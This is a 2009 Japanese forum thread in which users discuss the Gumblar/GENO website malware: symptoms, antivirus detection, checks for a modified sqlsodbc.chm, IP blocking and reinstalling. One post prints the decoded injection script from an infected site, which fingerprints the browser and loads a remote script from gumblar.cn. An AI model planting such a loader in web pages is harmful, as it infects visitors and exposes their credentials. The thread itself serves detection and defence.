>>482
感染したのはビスタの人でつか？

早く普通に駆除できるようにならんのかな

>>499
ビスタにsqlsodbc.chmはないから違うと思う

>>498
横柄の極み

同じ事を何度も言わせるわ、待たせるわ
PHSで東京から大阪まで電話代が幾ら掛かるか配慮もせんと
一回氏ね、みたいなw

>>501
�dｸｽ。
ビスタまで殺られたと思ってUNKOもらすとこだった！

374=384です

avastで、全ドライブをチェックかけましたが、ウイルスは検出されませんでした
これは、最初のアラート音が鳴った時に、ページを開く前にウイルスのコードをavastが発見して
実行するのを未然防止したと考えて良いんでしょうか？
それとも、もはやavastでも検出できないような姿に変化して、ブート領域にウイルスが住み着いているんでしょうか？

何か、ウイルスに感染しているかどうか確かめる方法（どっかのディレクトリの特定ファイルが削除されているとか、
改変されているとか、新しく特定名称のフォルダ、ファイルが作られているとか・・・）ってありませんか？

とりあえず、avastで全ドライブをチェックかけて、何も出て来なければ、感染を未然に防止できたと考えてOKでしょうか？

たった今、うっかりGENOのホームページに行ってしまったんだがまだヤバいの？
詳しいこと知らないので、心臓バクバクいってます。

>>471だけどカスペ先生の更新時期がもう直ぐavastは
無料なのにGENOウイルス検知するほど性能がいいのか・・
更新しないでavast使ってみようかなぁ
スレチでスマン

今回はたまたまavastが頑張ったという気もするけど
うちはavast＋定期的に他社オンラインスキャンで今までウィルスに引っかかった事は無いかな

>>493
ttp://up2.viploader.net/pic2/src/viploaderf157648.png

一時間かかった・・・・・
PCtoolは設定が面倒だなぁ

うちのルーターはIP焼き設定数上限に達しやがったぜ・・・

>>481
なぜか実際のサイズが
2,150,400 バイト

>>374>>497
今そこはサイトメンテナンスしているようだ
ユーザー名とパスワードを要求してくるな

IPブロックって、
peergurdianなんかでやるんですか？

GENOウイルスってトロイの木馬らしいですが、具体的にどういう悪さをするんですか？

スレ嫁

スレをざっと見渡した感じでは、良く挙動が分かっていないってことですかね？

>>515
そう書けば、誰かが教えてくれると思った？
面倒な人だね

書き込み>>425だが、チェックしてきたお

【ＯＳ】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・ＩＥのフリーズ

【確認手段】
1：ＰＣの再起動が正常か否か
2：sqlsodbc.chm　の改変の有無
3：ニフティでのオンラインチェック

【結果】
1：正常に起動○
2：改変は無し○
3：管理者モードでＩＥ起動方法わからず・・・orz△

3がチェックできれば完璧なんだが・・・

WHOのパンデミック警報はフェーズ5だけど、
このウイルスはフェーズ幾つぐらいよ？

>>516
いや、思いませんでしたよ
２ｃｈは不親切な人が多いですから

>>518
もうフェーズ6レベルじゃね？
収まる気配ゼロだし

>>517
カスペはやらなかったのか

あ、すまん、ニフやってきたのね

・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

>>522
一応事故解決してニフでチェックでできたお

【ＯＳ】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・ＩＥのフリーズ

【確認手段】
1：ＰＣの再起動が正常か否か
2：sqlsodbc.chm　の改変の有無
3：ニフティでのオンラインチェック

【結果】
1：正常に起動○
2：改変は無し○
3：ウィルスはなし○


ということで一応大丈夫みたい
ただちにウィルス更新とバックパックしてきま

>>484
unescape〜replaceの右上にgumblarが出てるな。

>>523
Googleの検索結果を改竄って初めて見るが、何処の情報？

>>526
ほい。

UnderForge of Lack ≫ Blog Archive ≫ ScanSafe reported the zlkon virus progress
http://www3.atword.jp/gnome/2009/04/19/scansafe-reported-the-zlkon-virus-progress/

>>523
何でもありだなｗ

XP厨はいつ何時やられるかわからず冷や冷やもんだな

>>523
なぶり殺しと言うか、何と言うか…。
いっそ、HDDを綺麗さっぱりフォーマットしてくれた方が…。

google検索改竄して自サイトへアクセスさせようとするのかな

終息してるし次スレは要らないね。

>>531
アフィリエイト狙いらしい。
そこから足が付きそうだけど、匿名口座とかも使ってるんだろう。

>>532
GENO社員乙

>>527
thx

このウイルス、VISTAはスルーなんだって？
俺、ＸＰなんだけど
cmd.exe、regedit.exeが起動したってことは
感染してないってことおｋなんだよね？

>>533
なるほど、意外とこすいなぁｗ

>>532
逆に拡散してると思うがｗ

>>536
念のために

【確認手段】
1：ＰＣの再起動が正常か否か
2：sqlsodbc.chm　の改変の有無
3：ニフティでのオンラインチェック

ぐらいはしておいたほうが･･･

>>523
・ゾンビ化も追加
ソースは>>324

>>530
生かさず殺さずだね

ＶＩＳＴＡ感染報告きてるね

まだ未確定の段階か

>>541
まじすか？

>>508
素直にPG2で設定しろよ。

>>532
なんか久しぶりだな。GENO社員乙ｗ

・Googleの検索結果を改竄(リンクを弄る)

↑これどうやって確認すればいいの？

>>543
まだ詳しいことかいてないからわからないけど、一応貼っとくね

***
あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
http://tsushima.2ch.net/test/read.cgi/news/1242145955/864

864 名前： キクザキイチゲ(中国地方)[sage] 投稿日：2009/05/14(木) 20:24:48.23 ID:0ZvJo5LH
該当時間のsaymoveにアクセスした後、パソコンの挙動がえらい不安定に
なったんだけど、やっぱりこれって喰らってしまったんでしょうか？。

ビスタHomePremium64bit+avast!なんですけど、
頻繁にフリーズするようになった（PCを購入して約２年一度も無かったのに、
一昨日から今日までに７回もフリーズ。）

あと、ついさっき、
スリープにしてても勝手に復帰している
スリープから復帰して暫くすると、ＨＤＤを認識しないようになる
といった症状がでた。

一応、カスペルスキーのオンラインスキャンの重要な部分だけを試して
みたけど、検出はされませんでした。トレンドマイクロの方も同様。

報告されている症状と全く違うんですが、どうなんでしょ？。

>>546
アフィのスクリプトをひとつずつページソースで確認するしかないでしょ。

>>548
面倒だなｗ

firefoxなんだけどWOT（Web of Trust）とか入れてもだめなのかな？

ちなみにWOTって「分かりやすく色分けされたWOTアイコンによって
サイトへのリンクをクリックする前に、オンライン詐欺、なりすまし
不審なショッピングサイト、セキュリティの脅威などを回避できます」
というアドオンですが、自分は入れてません

avastさんが感知してくれたのに誤作動だと思って突っ込んで感染した俺だけど
やっぱりIEがよく反応無しになる、おまけにパソゲーも反応無しになる
今カスペルスキーってとこでオンラインスキャンしてるが
このウイルスはどこに感染するんだ？32のチェックはもう終わったみたいだが
何も検出されなかったぞ？
全領域でやったら一件検出されたが何か勝手に止まったわ

ググれば一番上にくるからすぐ分かると思うけど「ライブハウス あさがやドラム」の
サイトも怪しいらしいのですが、誰かvistaの人確認してくれないかなｗ

>>550
感染が確実なら時間勿体無いから即リカバリしたほうがいいよ。
疑心暗鬼で使い続けるのは精神的に辛いでしょ

>>550
新種が毎日出ててカスペも新種は当然スルー

>>552
代えのHDDがねえんだよっ！仕事ねえからさ･･･

Aviraは感知してくれる？

誤作動はないし、>>539でチェックしても問題ないから、
いまんところ被害はないと思うけど、
怖いものみたさで問題サイト踏んでみたいという妙な欲望も・・・

>>551
感染してる

>>556
おおっ！！

ありがとう勇者様、一昨日は大丈夫だったらしいんだが･･･
なんか被害拡散してるなｗ

何れにしても中古の使い捨てＰＣでよかったよ。

これってプログラムが書き換えられるだけみたいだし
システムの復元とか使えないんだろか？

>>559
フルバックアップでもなければ無理だろ。

>>559
>システムの復元

それのほうが怖いよｗ

スレの伸び方が恐ろしい。
急に拡散した？

>>559
そんな無意味な事するくらいならインストールしなおすわ。

>>562
前から拡散、大手・個人の各サイトが隠蔽・感染に気づかず
新型インフルを超えた・・・。しかし、山田みたいに話題にも
あがらない・・・

>>544
こんなのあるのか
thx

>>549
中の人やユーザの評価で安全か有害か決めるんならあまり頼れないんじゃない？

PeerGuardian 2 for Windows β6b 日本語第2版
ttp://www.dukedog.flnet.org/cgi-bin/Statistics/dl.php?dl=pg2-050918-nt-jp
繋がらなくて落とせねぇ

>>566
だよね･･･

>>562
小林製薬(>>351)とネラーに利用者が多そうなSayMove!(>>282)の感染が発覚。

小林製薬が感染したことで、PCライトユーザーにも十分認知されればいいんだけど。。

これはググルさんが公式に対策に乗り出したってこと？
Google Safe Browsing diagnostic page for gumblar.cn
http://google.com/safebrowsing/diagnostic?site=gumblar.cn/&hl=en
Gumblar hitting Googlers hard
http://www.daniweb.com/blogs/entry4339.html#
Large amount of cross-site scripting attacks see websites compromised - SC Magazine UK
http://www.scmagazineuk.com/Large-amount-of-cross-site-scripting-attacks-see-websites-compromised/article/136763/

潜在感染者が多そうだな。

>>568
てゆうかWeb of Trustでググッたこのサイトは大丈夫かな？
http://d.hatena.ne.jp/starocker/20071206/p1
なんかもうどのサイトも不安になってきたよ
できたらチェックお願いVISTAの方

>>573
俺XPなんで、対策してても怖くて踏めませんｗ

ところで>>129が繋がんないんだけど、俺だけ？

ウイルスセキュリティZEROのサイトのサービスが止まってるってよ。

VMware導入した。ウイルスの挙動を確かめたいんで、感染済みのサイト教えてくれ。
あとAcrobat Reader9.1でも感染するっけ？

>>576
>>551

感染してすぐ症状出るものですか？

フラッシュとアドビ9.1入れてasagaya-drum.com 踏んだけど
特になにもおきない

（＼.n　　　　　安全安心とっても快適な工夫もいっぱい　windowsVISTA　みんな買おうよ！
　 ヽ .ｿ
　　| ｜　　　　　　　　　　∧＿∧ 　
　　| ｜ 　∧＿∧　　＿（　´∀｀） 　 　 ∧＿∧ 　　 ∧＿∧　　∧＿∧　　　 ∧＿∧　 　　 ∧＿∧
　　＼ ＼（ ´∀｀ ）￣　　　　　　⌒ヽ　（ ´∀｀ ）　　（ ´∀｀ ） _ （´∀｀　）⌒`（´∀｀　）--―（´∀｀　）　　　　n
　　　 ＼　　　　　⌒￣ヽ　　　　　 ./~⌒　　　　⌒/⌒　　　⌒ヽ 　　　　　/~⌒　　　　 ⌒＼　　　　　 ＼ 　 （ E）
　　∩.　`、　　　　　 ./￣|　　　　/／`i　　　　　/ 　　　　　　　/| 　　　　/／`i 　　　　　 /　| 　　　　ヽ　ヽ／ ／
　.　(7ヌ)｜　　　　　|　（ミ　　　　ミ） ｜ ∧__∧　 ｜　　　　 /（ミ　　　ミ）　　｜∧＿∧｜ ｜　　　　 | ＼__／
　　/　/　 ∧＿∧　　 　 ∧＿∧　　＿（　´∀｀） 　 　∧＿∧　　　∧＿∧＿（´∀｀　）　 　∧＿∧　　 ｜｜
　　＼ ＼（　´∀｀）―--（ ´∀｀ ）￣　　　　　　⌒ヽ　（ ´∀｀ ）　　（ ´∀｀ ） _　　　　　⌒ヽ（´∀｀　）　／／
　（＼.n＼　　　　　　　／⌒　　　⌒￣ヽ　　　　　/~⌒　　　　⌒/⌒　　　⌒ヽ　　　　　 /~⌒　　　　⌒　/
　 ヽ .ｿ　｜　　　　　 |ｰ、　　　　　/￣|　　　　　 /／`i 　　　　　 / 、　　　　　/| 　　　 /／` i　　　　　/
　　| ｜　｜　　　 　 |　 |∧＿∧ / 　（ミ　　　　ミ） 　｜　　　　｜ ｜　　　　/（ミ　　　ミ）　.｜　　　 ｜
　　| ｜ 　∧＿∧　　＿（　´∀｀） 　　∧＿∧ ｜　∧＿∧_＿_∧＿∧　 .｜∧＿∧　 ＼　∧＿∧.｜
　　＼ ＼（ ´∀｀ ）￣　　　　　　⌒ヽ（ ´∀｀ ）　|　（ ´∀｀ ） _ （´∀｀　）⌒`（´∀｀　）--―（´∀｀　） |　.　.　n
　　　 ＼　　　　　⌒￣ヽ 　　　　. /~⌒　　　　⌒/⌒　　　⌒ヽ 　　　　　/~⌒　　　　 ⌒＼　　　　　 ＼ 　　（ E）
　　∩.　`、　　　　　./￣|　　　　/／`i　　　　　 / 、　　　　　 /| 　　　　/／`i 　　　　　 /　| 　　　　 ヽ　ヽ／ ／
　.　(7ヌ)｜　　　　　|　（ミ　　　ミ） 　｜　∧　∧ ｜　　　　/（ミ　　　　ミ）　｜∧　∧ ｜ ｜　　　　 | ＼__／

ポットウィルスなら駆除出来るけどこれは難しいのかなぁ

>>580
お前ら全員VistaにくるとVistaが狙われるようになるから来ないでくれるか？

>>567
オレも導入しようとしたが、日本語版とれないな・・・

>>579
>>102は？

aguseでは白だな。＞あさがやドラム

質問です。

私、セキュリティソフトはソースネクストの ウィルスセキュリティZERO を使ってるのですが、

このセキュリティソフトはGENOウィルスに対応しているんでしょうか？

>>586
>>575

>>584
アドビ8.13にして全部踏んだけどなんともないわ

>>579
>>432のGoogle セーフ ブラウジングの結果で挙げられている幾つかのサイトはどうか。

>>579
そのサイトも侵されている

Adobe Reader・Acrobat に不正終了やコード実行の脆弱性―JPCERT/CC が注意喚起 - japan.internet.com Webテクノロジー
http://japan.internet.com/webtech/20090514/5.html

本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布：ITpro
http://itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/
こっちは関係あると思ったらなかった

もうなにがなんだかｗｗｗｗｗ

どこ踏んでも、sqlsodbc.chmの改変確認できねえぞ

ポッドウィルス駆除じゃこれは取りきれないか？

ポッドウィルスw

>>594
つ クリーンインストール

>>593
↓このスレから種を拾って直接実行すれば…。

【鑑定目的禁止】検出可否報告スレ10
http://pc11.2ch.net/test/read.cgi/sec/1235459712/

>>595
ごめん。ポットだったｗ

またかｗ

BIG-server.com binboserver.com メンテナンス / 障害報告
http://www.maido3.cc/server/release/2009/200905082023.html

PG2導入したんですが、上記セキュリティブログの58.65.232.0 - 58.65.239.255とかの数字を
PG2のリスト追加にコピペすればいいのかな？

今北産業　現状のウイルス対策ソフトじゃ対応できないってマジ？

亜種がワラワラ出てきてるｗｗｗ
対応おっつかねｗｗｗ

Adobe Reader 9.1.1のアップデート、Adobeの日本語サイトにぜんぜん載ってないじゃん
わかりやすく載せとけよ

maidoの感染は、マァブが原因らしい

具体的に被害が出てるのはOS関連ファイル？
普通のファイルにも感染する？

ソフト会社の人にはモカやユンケル飲んで死なない程度にがんばってほしい。

   対策
    * WindowsUpdate
    * PDFリーダーを最新にする　（AdobeReader　や Foxit Reader）
    * AdobeFlashを最新にする
    * 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
    * Javascriptを切る
    * 貼られている怪しいリンクをむやみに開かない
    * ウイルス定義ファイルを更新する

↑これの
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
はfirefoxのアドオンで対応できますか？

>>567 >>583　こちらへ

PeerGuardian 33
tp://hideyoshi.2ch.net/test/read.cgi/download/1237676474/

>>607
アンチウイルスのFWに設定したほういいと思う

Javascript切ると見れなくなるサイトいっぱいあるじゃん
不便すぎる

adobe関係をアンインストールしときゃなんとかなる？
WindowsUpdateは今回のGENOウィルスには関係無いだろうけど、セキュリティー
強化の為にはまあ必要なことだ。

>>608
ありがとう。スレあったのね。いってきマース

>>609
ウイルスバスターだけど、設定画面みても分からんなｗ
ひょっとしてできないのかしら･･･

>>613
暇だから調べてみた
ttp://virus.bind-web.net/virusburster2009/wall/wall-reigai.html
この辺参考にならん？

>>613
例外ルール（プロトコル）でぐぐれ

>あさがやドラム
解読してみた。

(function(xHRY){var Yh7='var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window." a ")j=j "+a "Major" b a "Minor" b+a "Build" b "j;");
document.write("<script src=//gumblar.cn/rss/?id="+j "><\/script>");}';var x6Z=Yh7.replace(xHRY,'%');eval(unescape(x6Z))})(/_/g);

真っ黒でつ。

ﾄﾞｸｵが混じってるかと思ったら別もんか
("A")

/gumblar.cn・・・

でもこれで感染したサイトへの電凸が容易になったんじゃない？
「小林製薬のサイトを見てください、それと同じウイルスに感染していますよ」って説明できるし
（誰もが知っている）大手のサイトだから信用もしてもらいやすくなったはず

>>617
こっちは泣いてるおにゃのこっぽいな＞ (/_/g);

ﾒｶﾞﾈﾒｶﾞﾈ ("A" )))....

b "j;")

大山鳴動して鼠一匹

ポケモンのファンサイトにも感染してたけどこれはどういう事なんだ？


で、メール送っても対応無し。ブログ見ると「よくわからないので土曜日に兄に対応してもらいます」

…

どういうこともなにも感染してたんだろう
お兄ちゃんがわかってくれるか心配だね

弟なのか妹なのか

しかし…
この脅威に世間は知らん振りか。

>>624
ｗ

abuse.jpにアドレスぶち込めば、観戦か否かを判定できるんですか？

>>629
最新亜種はまず無理。
aguse.jpがどんなUAで繋ぎに行ってるのかによってはまったく検出されない。

>>601
事前にガードは出来るけど。
GDATAはページを開く前に真っ赤な画面になってアクセス拒否してくれた

aguse.jpってカスペなの？

>>631
それは、Avastが対応しているので、Avastのエンジンが検知してブロックしただけ。
他のベンダーだとすりぬけて、gumblar.cn の呼び出しまで進んじゃうよ。

aviraはどうなの？ちゃんと対応してる？

sqlsodbc.chmのサイズが50727バイトならとりあえず感染はしてないってことなの？

>>634
http://pc11.2ch.net/test/read.cgi/sec/1235459712/862
自分で解凍してスキャンかけて確かめろ

ここでも調べられます。　　　tp://www.gred.jp/

>>634
gumblar.cnの新種にはまだ対応していない。
って言うか、いたちごっこだよ。

国を指定して全てブロック出来れば良いのにね。出来るのかな？日本と米国以外行かないし。

うっかりgumblar.cn開いちゃったけど、FirefoxのSafe Browsing APIでブロックされた…
IEだったら死んでたな

ＧＥＮＯウイルスってＨＤも破損するんだろうか？
なんかクリーンインストールかけたんだけれどネットやってるとたまに切断されるようになっちゃったんだよな…

ウイルスバスター2007のURLフィルタとフィッシングチェッカーを有効にした状態で
IE6にて、あさがやドラム のURLを開くと　「危険なサイト　アドレス ｈｔｔp://gumblar.cn/rss/?id=568835」とメッセージが出た

UnderForge of Lack ≫ Zlkon, Gumblar 問題に関して
http://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

gumblarに感染してたサイトのお詫び文が、
ノートンやバスターは検出しなかったしavastの誤検出っぽいけど、
avastユーザからの指摘がウザイので一応アップし直します
のように書いてあってなんだか悔しくなった

感染してもはっきり分からないから世間の感覚はこんなもんか

初心なことかもしれないけど
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
を制限するさいtcpとudpどっちなの？

アップし直すだけじゃ無駄なのにな

>>643
これ、次スレのテンプレに入れた方が良いんじゃね？

>>644
ウイルスバスターでもブロックはできているみたいだ

>>648
おそらく管理人がスキャンしたのはバスターが対応する以前と思われ
サイトが何日も感染した状態で放置されてたから

>>645
TCPでしょう
いま、gumblar.cnでは94.229.65.172ですね

>>649
ウイルスバスター2007の標準設定では反応なかったけれど
フィッシングチェッカーを有効にしたらメッセージがでるようになったよ

久しぶりに踏んでみたがリファラをチェックするようになったんだな
リファラ切ってるとpdfもswfも読み込まれない

>>650
おｋ
ありがとう

>>645
どちらかを制限しない理由があるのか？

すっげーやばそうなウイルスなのに
あまり騒がれていないのは気のせいなの？

>>644
パスワードを変えなきゃ再度改竄されるよ、と言ってあげないと…。

>>641
運が悪いと壊れるかもしれないけど切断とHDD関係なくね？

パスワード変えても無駄

管理者のPCのOSをクリーンインスコして、パスワードを変える。

バスターはフィルタリング機能があるから
URLブラックリストに登録されれば遮断してくれるということか

http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=zlkon.lv+%A4%AB%A4%E9+gumblar.cn+%A4%D8
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1126127806
http://excomp.cocolog-nifty.com/blog/2009/05/gumblarcnmd5-1b.html
http://puppet.asablo.jp/blog/2009/05/02/4283214
http://dxd8.com/archives/192/
http://ilion.blog.shinobi.jp/Entry/85/

>>655
気のせいじゃないよ。もっと話題になっても良いと思う。
亜種がどんどん出るらしいし、それら全てに対応できるセキュリティソフトはおそらくない。
クリーンイストールしか解決策が無い。
やばいですね・・・

http://blogs.yahoo.co.jp/noooo_spam
http://excomp.cocolog-nifty.com/blog/kaspersky/index.html


告知情報はこんなもんか？


豚インフルの比じゃねえ　はんぱねえ感染力！

GENOは結局どこからこのウイルス持ってきたんだろ。

現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
　※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している（このため、セキュ各社の自動検出が難しくなっている）
感染しない環境には何も返さない（更に検証が難しい）
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
　※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

>>662
動画サイトとかFlash多様してるサイトなんかスクリプト許可しなきゃ見れないし
よく見るサイトが感染してたら知らないうちに被害受けるしな
注意してても危ないのに普通のやつなんかもう死んだも同然だろ

>>665
Gumblarさん、マジパネェっす！

＞※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。

俺は考えるのをやめた

>>666
だよね。
いつも見てるサイトが感染したらと思うとおそろしいわ・・・

>>508
参考にしてみた
thx

GENOウィルスの怖いところはサーバ側で攻撃方法を自由に変えられるところなんだよな

・JavaScriptオフ
　　GENOの例を見る限り改竄はリモートから行われている。
　　今はJSを介しているがある日突然ダイレクトにembedタグ、objectタグを挿入される可能性がある。
　　この場合JSオフでの対応は不可能。

・Adobe Reader、Flash Playerを最新版にする、代替プラグインを使う
　　攻撃コードを入れ替えることができるので他のプラグイン、アプリの脆弱性を狙うことも可能。
　　最悪の場合ゼロデイを狙われる可能性もある。

・IE以外のブラウザを使う
　　Adobe関連の脆弱性はブラウザに依存しない。

・IPまたはドメインでブロック
　　攻撃コードを更新していくらでも別のサーバに振り向けることが可能。

・アンチウィルスでの対応
　　攻撃ファイルの更新が早く定義ファイルでの対応が追いついてない。

>>666
readerもflashも最新版になってれば被害は防げるそうだけど
flashの方はウェブサイト側で警告出せるみたい（ニコ動は警告出してたような）
readerの方はアップデートしない人多いだろうなあ

GENOにかかるとネットに繋がる時間が長くなるってほんと？


Googleに全然つながらないんだが

Flash Playerを無効にしたらどう？

IEだと切り替え大変だけれど

ネットのインフルエンザはパンデミックだな

てか無自覚で感染してるＰＣ多いんじゃないか？

何か感染したと思ったんだけど
いろんなチェックしてたらIE落ちなくなったわ
でもゲームが反応無しになる、なんだこれ

はんぱねえ

何でGENOってウイルス作ってばら撒いてるのに情報通信規制法で逮捕されないの？

ＷｉｎＭｅなんですが、ＧＥＮＯウイルスに感染する危険はありますか？
ＸＰはヤバイと聞きますが・・・

Meの情報ないね　どうなの？

これが後に語り継がれるMe最強伝説の始まりである。

親父が頑なにjavaオンのIEを使いたがる
切り替えが楽なプニルや火狐も入れといて説明したのに

>>672
ｼﾞｬﾊﾞｽｸいつも切っていて火狐でﾈﾄｻﾌしていたら感染サイトを踏んでしまった
AVAST先生がいかり出したので接続きってブラウザ閉じたらウィルスをチェストに
隔離した方がいいとかいう画面が出てそのまま隔離
チェストをのぞいたら該当サイトのキャッシュが固まっていた
AVASTのスキャンとニフティスキャンをしたら感染０だったがブートスキャンも
しといたほうがいいかな？

JavaScriptオフでも感染！？

>>684
俺、avastでチェストに隔離できなかったんだけど大丈夫かな？

豚どころじゃねえぞ　おい

これ対策でAdobe Readerを9に入れ替えたけど、
実は6.0.6を使ってた方が安全だったりする？ｗ

オフにして感染されちゃどうしようもないなぁ

>>684
JavaScriptオフで反応したんであれば、
avastが感染したページに挿入されたコードに反応したのかもしれない。
そうするとブラウザ自体はgumblarのスクリプトを実行してないので、感染はしていない。
いずれにせよ感染ページにどういうコードが仕込まれていたかによる。
JavaScriptが挿入されていたのなら問題はないはず。

はやい話でIEが狙われているのですか？

>>686
他で踏んだ時は警告音と右下に二つほどなんか説明でてすぐ消えた
この時は遮断クリックしたらおｋで終わった
今日のは右下に三つくらい説明が出てクリックしたらおｋが出て
クリックした後にブラウザ閉じたらチェスト行き画面が出た

因みにフラッシュは最新版だがリーダーは７
でもリーダー嫌いなのでリーダーの設定を起動する時はお伺いを
しろにしてあるので勝手に起動はしていない

>>691

はやい話でそういうこと

しかしこいつのハンパねえところは
IE以外でもヤられる可能性がないわけではないというところだ

>>692
俺も警告音がなって、下に黄色い横長の警告文字が出てきて
すぐにＩＥを閉じたんだよ

で、その後に、「トロイの木馬」が検出されたってavastのウィンドウが出てきて
「チェストに移動」ってクリックしたのに、エラーになって移動できなかったんだよね

んで、すぐにTemporaryInternetFileの中身を削除して、avastで全ドライブをチェックしたんだけど、
何もウイルスとか出てこなかった・・・

これって、最初の警告音が出てavastが反応した時に、ウイルスサイトにアクセスする前に
防いでくれて、感染しなくて済んだって解釈でいいのかな？
チェストに移動できなかったのは、すぐにブラウザを閉じたから？

感染サイトにアクセスしてしまったよ
Avastがブロックしてくれたよ ﾏﾏﾝ…

いったいこのウイルスは
どのくらいの規模なのですか？

>>695
チェストに移動できた？

>>690
怖くてソース覗きに行く勇気ありませんｗ
二回ともｼﾞｬﾊﾞｽｸきった状態で警告された

隔離されているやつの名前はCACHE--002
ファイル名はあてにならないかもしれないがexeじゃなくてCACHEだった

さっき知って飛んできました

みごとに感染してました　ｵﾜﾀ

感染したらどうすればいいですか？

感染しているか、していないか確認する方法ってありますかね？

>>700

>>665にあります

感染したらインストールし直すしかないのでしょうか？

>>699

ご愁傷さま

PCのOSクリーンインスコ入れ替えれ

>>697
ソース見れればいろいろわかるんだが…
恐らく挿入されたJavaScriptに反応してるだけだと思うんで大丈夫だと思うけども
まあ気になるならクリーンインストールお勧め

Avastが活躍する話が多いな
Aviraから乗り換えようか悩む

キャッシュはこれか？
ttp://support.mozilla.com/ja/kb/Firefox+のキャッシュファイルがウイルスに感染した

ｽﾚを見返したり、まとめ見たり、ｸﾞｸﾞったりすればすぐわかることだと思うけど、
クリーンインストール以外の解決策は今のところないよ

あの今日一日で３つも感染しているホームページを開いてしまいました
TVはインフルエンザよりもこっちを報道するべきじゃないですか

>>701
Ｍｅの場合は、どのファイルを見ればいいですか？

Meまだ使ってる人多いのかな？
感染報告ないよね。気になるなぁ

Me使っているくらいなら

感染していても無自覚なんじゃないか？

>>698
何で調べたの？

firefoxの話題が多いようだからさっきfirefox導入して
ieのお気に入りをfirefoxにインポートしたんだけど
そのあとspybotで検査してたらfirefoxに入っていたお気に入り全部がspybotに引っかかったんだけど800個ぐらい
一応元がfirefoxのお気に入りからという事がわかってるからあんまり気にしてないんだけど
今回の件と関係あるかな？

>>711

上に出ていた方法で調べました

どうしよう orz

>>712
spybotスレに似たような報告があったと思うが
誤検出っぽいよ

とりあえず、ウィルスの作者を見つけ出して逮捕してくれ。
以前もこんな感じのことがあったよな。
その時は犯人が逮捕されたけれど。
勿論、外国で外国人が逮捕されたわけだがな。
被害が世界中に及ぶから性質が悪い。

>>591
>本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布：ITpro
>tp://itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/
の
>このプログラムをウイルスだと判定したのは14製品だけだった

この14製品を書かないと記事として片手落ちだろう。つーか知りたい。
多分ノートン先生は失格だろうなあ。

ここまで危険なウイルスっていままでにあった？
知り合いが感染していたよ。
まじやばい。

ニフティのオンラインスキャンしたけど感染してなくてほっとした。
バスター2009いれてて、ＵＲＬフィルタもフィッシングブロックも有効にしてるけど
XPだから油断できないな…

firefoxでも危険なんだよなコレ？
うかつにﾈｻﾌできねーじゃん…

>>714
ええ、そうなの？
実は2回に分けて検出されたんだよね
1回目は500個ぐらいで
2回目は300個ぐらい
そんで全部修正して3回目には見つからなくなったけど
何それじゃspybotがfirefoxのお気に入りを誤検出してたということか
thx

感染したかどうかがわからんが
ニコニコみてたら（クリックした時）IEがよく固まるな。

つーか、発見から3ヶ月くらいたってない？
いまだ解決策はおろか、判別法も無しかよw

sqlsodbc.chmはとりあえず改ざんされてない場合の場所に
ファイル名実行できた
AVASTがキャッシュ隔離したしカスペとスパイボットとAVAST
スキャンで感染０だったからもう寝るヽ(`Д´)ﾉ

>>610
気象庁のレーダーとかアメダスとかな。
Operaとかだとサイト毎に設定できるんだが
今回のは気象庁のサイトだって汚染される可能性もあるしいやはや・・

発見から3ヶ月もたってるのか？これ。

さっきブログではじめて知ったよ。

どこかで報道されていないの？

>>720
genoで見つかったのが4月最初くらいじゃなかったか？だから1ヵ月半くらいだと思う
genoより前から話題になってたらわからんけど

システムの復元は無意味？

>>725

クリンインスコをおすすめ
システムそのものを書き換えます

>>725
感染したんならｸﾘｰﾝｲﾝｽﾄｰﾙ以外は意味ないよ

４月に楽天のスレでGENO感染楽天店舗対応最悪で
ﾌﾟﾁ祭があったけど我が身に這い寄ってくるとは
おもなんだナイアルラトホテプ

>>727
はっきりと感染ってどうやったら判明するのか
明確な基準ないよな

>>724

1ヶ月半なら、もっとニュースになっていてもいいよね？
検索してみても個人のページしか出てこないや

感染したら、クリーンインストールするしかない

って言うけどさ、そもそも感染しているのかどうか判別できないんだけど？
感染の有無を判定する方法って何か無いの？

GENOウイルス大活躍だな、なんでこんなにすごいんだ？

>>718

IEよりはだいぶましだが油断は禁物

>>731

過去スレ、ちゃんと見たか？

完璧な判定方法がないからやべえんだよ、こいつは。

とりあえず、avastでチェックかけたら大丈夫だった
